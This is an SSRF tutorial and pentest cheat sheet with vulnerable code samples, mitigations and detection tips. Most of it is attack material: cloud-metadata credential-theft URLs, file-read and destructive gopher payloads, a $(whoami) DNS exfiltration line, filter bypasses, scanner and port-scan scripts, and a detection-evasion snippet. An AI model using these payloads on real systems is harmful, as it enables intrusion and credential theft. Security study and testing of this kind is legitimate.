OWASP A10:2021 - Server-Side Request Forgery (SSRF)

Overview

Server-Side Request Forgery (SSRF) flaws occur whenever a web application is fetching a remote resource without validating the user-supplied URL. It allows an attacker to coerce the application to send a crafted request to an unexpected destination, even when protected by a firewall, VPN, or another type of network access control list (ACL).

CWE Mappings: CWE-918 (Server-Side Request Forgery)

Attack Vectors and Impact

Internal Network Access

• Access internal services (databases, admin panels, metadata services)

• Port scanning internal networks

• Bypassing network-level access controls

• Reading internal configuration files

Cloud Metadata Exploitation

• AWS EC2 metadata (169.254.169.254)

• Google Cloud metadata (metadata.google.internal)

• Azure metadata (169.254.169.254)

• Accessing IAM credentials and sensitive configuration

Data Exfiltration

• Reading local files via file:// protocol

• Accessing internal APIs and databases

• Retrieving sensitive information from internal services

Common Vulnerable Patterns

URL/Webhook Parameters

# Vulnerable Flask application
@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    response = requests.get(url)  # No validation!
    return response.text

# Attack: /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

Image/File Processing

// Vulnerable PHP code
$image_url = $_POST['image_url'];
$image_data = file_get_contents($image_url);  // Vulnerable!
file_put_contents('/uploads/' . $filename, $image_data);

// Attack: image_url=file:///etc/passwd

API Integrations

// Vulnerable Node.js webhook
app.post('/webhook', (req, res) => {
    const callback_url = req.body.callback_url;
    
    // Process webhook data...
    
    // Send confirmation to callback URL
    http.get(callback_url, (response) => {  // Vulnerable!
        // Handle response
    });
});

URL Shortener Services

# Vulnerable URL expansion
def expand_short_url(short_url):
    response = requests.head(short_url, allow_redirects=True)
    return response.url  # Can be manipulated to internal URLs

Detection and Reconnaissance

Initial Discovery

# Look for parameters that accept URLs
# Common parameter names:
url=, uri=, path=, continue=, window=, next=, data=, reference=, site=, 
html=, val=, validate=, domain=, callback=, return=, page=, feed=, host=, 
port=, to=, out=, view=, dir=, show=, navigation=, open=

# Test with external collaborator service
curl "https://target.com/api/fetch?url=http://burpcollaborator.net"
curl "https://target.com/webhook" -d '{"callback":"http://collaborator.net"}'

Burp Suite Detection

# Burp Collaborator payloads
http://BURP-COLLABORATOR-SUBDOMAIN.burpcollaborator.net
https://BURP-COLLABORATOR-SUBDOMAIN.burpcollaborator.net

# DNS exfiltration
http://$(whoami).BURP-COLLABORATOR-SUBDOMAIN.burpcollaborator.net

Manual Testing Checklist

# Test different protocols
http://internal-server
https://internal-server  
ftp://internal-server
file:///etc/passwd
dict://127.0.0.1:11211/stat
gopher://127.0.0.1:6379/

# Test localhost variations
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::]
http://0000::1

Advanced Exploitation Techniques

Cloud Metadata Exploitation

AWS EC2 Metadata

# Basic metadata access
http://169.254.169.254/latest/meta-data/

# Get instance identity document
http://169.254.169.254/latest/dynamic/instance-identity/document

# Access IAM credentials
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE-NAME]

# Get user data (often contains secrets)
http://169.254.169.254/latest/user-data/

# IMDSv2 (requires token)
# Step 1: Get token
curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
# Step 2: Use token in subsequent requests
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/

Google Cloud Metadata

# Basic metadata
http://metadata.google.internal/computeMetadata/v1/
http://169.254.169.254/computeMetadata/v1/

# Requires Metadata-Flavor header
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/

# Get access tokens
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Get service account info
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/

Azure Metadata

# Basic metadata (requires Metadata header)
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# Get access tokens
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Protocol-Specific Attacks

File Protocol Exploitation

# Read local files
file:///etc/passwd
file:///etc/hosts
file:///proc/version
file:///proc/self/environ
file:///proc/self/cmdline

# Windows files
file:///c:/windows/system32/drivers/etc/hosts
file:///c:/windows/win.ini

Gopher Protocol for Service Interaction

# Redis interaction
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a

# MySQL interaction  
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00admin%00%00mysql_native_password%00

# SMTP interaction
gopher://127.0.0.1:25/_MAIL%20FROM:attacker@evil.com%0ARCPT%20TO:victim@target.com%0ADATA%0ASubject:SSRF%0A%0AMessage%20body%0A.%0AQUIT

Dict Protocol for Port Scanning

# Port scanning using dict protocol
dict://127.0.0.1:22/stat   # SSH
dict://127.0.0.1:80/stat   # HTTP
dict://127.0.0.1:443/stat  # HTTPS
dict://127.0.0.1:3306/stat # MySQL
dict://127.0.0.1:5432/stat # PostgreSQL

Bypass Techniques

IP Address Obfuscation

# Decimal notation
http://2130706433/  # 127.0.0.1

# Hexadecimal notation
http://0x7f000001/  # 127.0.0.1

# Octal notation
http://0177.0.0.1/  # 127.0.0.1

# Mixed formats
http://127.1/       # 127.0.0.1
http://127.0.1/     # 127.0.0.1

# IPv6 formats
http://[::1]/       # localhost IPv6
http://[::ffff:127.0.0.1]/  # IPv4-mapped IPv6

DNS-Based Bypasses

# Use services that resolve to internal IPs
http://localtest.me/        # Resolves to 127.0.0.1
http://127.0.0.1.nip.io/    # Resolves to 127.0.0.1
http://127.0.0.1.sslip.io/  # Resolves to 127.0.0.1

# Custom DNS records
# Create A record: internal.yourdomain.com -> 127.0.0.1
http://internal.yourdomain.com/

# DNS rebinding
# Domain that alternates between external and internal IP
http://rebinding.yourdomain.com/

URL Encoding and Manipulation

# Double URL encoding
http://127.0.0.1/ -> http%3A%2F%2F127.0.0.1%2F -> http%253A%252F%252F127.0.0.1%252F

# Unicode normalization
http://127.0.0.1/ -> http://①②⑦.⓪.⓪.①/

# Using @ symbol
http://evil.com@127.0.0.1/
http://127.0.0.1@evil.com/   # Some parsers misinterpret this

# Using backslashes
http://127.0.0.1\\@evil.com/

# Fragment confusion
http://evil.com#@127.0.0.1/

Redirect-Based Bypasses

# Open redirect on trusted domain
http://trusted-domain.com/redirect?url=http://127.0.0.1/

# HTTP 301/302 redirects
# Create a server that redirects to internal resources
curl -i "http://your-server.com/redirect-to-internal"

# Meta refresh redirects
# HTML page with: <meta http-equiv="refresh" content="0; url=http://127.0.0.1/">

Automated Testing Tools

Custom Python Scanner

import requests
import threading
from urllib.parse import urljoin

class SSRFScanner:
    def __init__(self, target_url, collaborator_url):
        self.target_url = target_url
        self.collaborator_url = collaborator_url
        self.common_params = [
            'url', 'uri', 'path', 'continue', 'window', 'next', 'data',
            'reference', 'site', 'html', 'val', 'validate', 'domain',
            'callback', 'return', 'page', 'feed', 'host', 'port'
        ]
        
    def test_parameter(self, param):
        payloads = [
            f"http://{self.collaborator_url}",
            f"https://{self.collaborator_url}",
            "http://127.0.0.1:80",
            "http://localhost:8080", 
            "file:///etc/passwd",
            "http://169.254.169.254/latest/meta-data/"
        ]
        
        for payload in payloads:
            try:
                response = requests.get(
                    self.target_url,
                    params={param: payload},
                    timeout=5
                )
                print(f"Tested {param}={payload}: {response.status_code}")
            except requests.RequestException:
                pass
                
    def scan(self):
        threads = []
        for param in self.common_params:
            t = threading.Thread(target=self.test_parameter, args=(param,))
            threads.append(t)
            t.start()
            
        for t in threads:
            t.join()

Burp Suite Extensions

• SSRF Sheriff: Automated SSRF detection

• Collaborator Everywhere: Inject collaborator payloads

• Backslash Powered Scanner: Advanced payload testing

Nuclei Templates

# Custom SSRF nuclei template
id: ssrf-test

info:
  name: SSRF Detection Test
  author: pentester
  severity: high

requests:
  - method: GET
    path:
      - "{{BaseURL}}/fetch?url=http://{{interactsh-url}}"
      - "{{BaseURL}}/api/webhook?callback=http://{{interactsh-url}}"
    
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

Internal Network Reconnaissance

Port Scanning via SSRF

# Python script to scan internal ports via SSRF
import requests

def ssrf_port_scan(base_url, target_host, port_range):
    open_ports = []
    
    for port in port_range:
        try:
            response = requests.get(
                f"{base_url}/fetch",
                params={'url': f'http://{target_host}:{port}'},
                timeout=3
            )
            
            # Analyze response for indicators of open ports
            if response.status_code == 200 and len(response.text) > 0:
                open_ports.append(port)
                print(f"Port {port}: OPEN")
            elif "connection refused" in response.text.lower():
                print(f"Port {port}: CLOSED")
            else:
                print(f"Port {port}: FILTERED")
                
        except requests.RequestException:
            print(f"Port {port}: TIMEOUT")
    
    return open_ports

# Usage
open_ports = ssrf_port_scan(
    "https://vulnerable-app.com", 
    "127.0.0.1", 
    range(1, 1024)
)

Service Discovery

# Common internal services to test
http://127.0.0.1:22     # SSH
http://127.0.0.1:80     # HTTP
http://127.0.0.1:443    # HTTPS
http://127.0.0.1:3306   # MySQL
http://127.0.0.1:5432   # PostgreSQL
http://127.0.0.1:6379   # Redis
http://127.0.0.1:9200   # Elasticsearch
http://127.0.0.1:27017  # MongoDB
http://127.0.0.1:8080   # Alternative HTTP
http://127.0.0.1:8443   # Alternative HTTPS

# Internal web interfaces
http://127.0.0.1:8080/manager/html  # Tomcat Manager
http://127.0.0.1:9200/_cluster/health  # Elasticsearch
http://127.0.0.1:8888/  # Jupyter Notebook

Exploitation Scenarios

AWS Credential Extraction

# Step 1: Discover instance metadata
http://169.254.169.254/latest/meta-data/

# Step 2: Get IAM role name
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Step 3: Extract credentials
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE-NAME]

# Response contains:
# - AccessKeyId
# - SecretAccessKey  
# - Token
# - Expiration

Internal API Access

# Accessing internal admin APIs
payloads = [
    "http://127.0.0.1:8080/admin/",
    "http://127.0.0.1:9200/_cluster/settings",
    "http://127.0.0.1:6379/",  # Redis
    "http://127.0.0.1:8086/query?q=SHOW DATABASES",  # InfluxDB
]

File Disclosure

# Linux files
file:///etc/passwd
file:///etc/shadow
file:///etc/hosts
file:///proc/version
file:///proc/self/environ
file:///home/user/.ssh/id_rsa

# Windows files  
file:///c:/windows/system32/drivers/etc/hosts
file:///c:/users/administrator/desktop/
file:///c:/inetpub/wwwroot/web.config

Defense Evasion

Time-Based Detection Evasion

# Add delays to avoid detection
import time

def stealthy_ssrf_scan(urls):
    for url in urls:
        response = make_ssrf_request(url)
        time.sleep(random.uniform(1, 5))  # Random delay
        process_response(response)

Response Size Variation

# Use different payload sizes to evade detection
http://127.0.0.1/  # Small
http://127.0.0.1/some/longer/path/that/might/exist/  # Medium
http://127.0.0.1/very/long/path/with/lots/of/parameters?a=1&b=2&c=3  # Large

Testing Methodology

1. Discovery Phase

• Identify parameters that accept URLs/URIs

• Test with external collaborator services

• Check for different input methods (GET, POST, JSON, XML)

2. Validation Phase

• Test bypass techniques for filters

• Try different protocols and encodings

• Verify actual request is made (timing, collaborator, errors)

3. Exploitation Phase

• Access cloud metadata services

• Scan internal networks

• Access internal services and APIs

• Attempt file disclosure

4. Impact Assessment

• Document accessible internal resources

• Identify sensitive data exposure

• Assess potential for further exploitation

Mitigation Strategies

Input Validation

# Allowlist approach
ALLOWED_HOSTS = ['api.trusted-partner.com', 'webhooks.example.com']

def validate_url(url):
    parsed = urlparse(url)
    
    # Check protocol
    if parsed.scheme not in ['http', 'https']:
        raise ValueError("Only HTTP/HTTPS allowed")
    
    # Check host allowlist
    if parsed.hostname not in ALLOWED_HOSTS:
        raise ValueError("Host not in allowlist")
    
    # Check for private IP ranges
    try:
        ip = ipaddress.ip_address(parsed.hostname)
        if ip.is_private or ip.is_loopback:
            raise ValueError("Private/loopback IPs not allowed")
    except ValueError:
        pass  # Not an IP address
    
    return url

Network Segmentation

# Firewall rules to block metadata access
iptables -A OUTPUT -d 169.254.169.254 -j DROP
iptables -A OUTPUT -d 127.0.0.0/8 -j DROP
iptables -A OUTPUT -d 10.0.0.0/8 -j DROP
iptables -A OUTPUT -d 172.16.0.0/12 -j DROP  
iptables -A OUTPUT -d 192.168.0.0/16 -j DROP

Application-Level Controls

# Response size limits
def fetch_url(url, max_size=1024*1024):  # 1MB limit
    response = requests.get(url, stream=True)
    
    content = b""
    for chunk in response.iter_content(chunk_size=8192):
        content += chunk
        if len(content) > max_size:
            raise ValueError("Response too large")
    
    return content.decode()

Detection and Monitoring

Log Analysis

# Look for SSRF indicators in logs
grep -i "169.254.169.254" /var/log/nginx/access.log
grep -i "localhost\|127.0.0.1" /var/log/application.log
grep -i "file://\|gopher://\|dict://" /var/log/proxy.log

Network Monitoring

# Monitor unusual internal network connections
# Watch for connections to metadata services
# Alert on file:// protocol usage
# Monitor for internal port scanning patterns

Common Testing Pitfalls

False Negatives

• Application might make request but not return response

• Timeouts might indicate successful connection

• Error messages might reveal internal information

False Positives

• External services might be accessible for legitimate reasons

• Some "internal" IPs might be intentionally accessible

• Applications might have legitimate reasons to access metadata

Business Impact

High Impact Scenarios

• Cloud credentials exposure leading to full account compromise

• Internal network access bypassing security controls

• Sensitive file disclosure (configuration, source code)

• Internal service manipulation (databases, caches)

Compliance Considerations

• PCI DSS: Network segmentation requirements

• SOX: Internal controls access

• HIPAA: Protected health information access

• GDPR: Unauthorized personal data access

Tools and Resources

Detection Tools

• Burp Suite: Manual testing and extensions

• OWASP ZAP: Automated SSRF detection

• Nuclei: Template-based scanning

• SSRFmap: Automated SSRF exploitation tool

Collaborator Services

• Burp Collaborator: Built-in to Burp Suite

• interactsh: Open source interaction server

• Pingb: Online HTTP request bin

• RequestBin: Request capture and analysis

Cloud-Specific Tools

• pacu: AWS exploitation framework

• ScoutSuite: Multi-cloud security auditing

• CloudMapper: AWS network visualization

---

Server-Side Request Forgery represents one of the most critical vulnerabilities in modern web applications, especially in cloud environments. Always test thoroughly and document the full scope of accessible internal resources.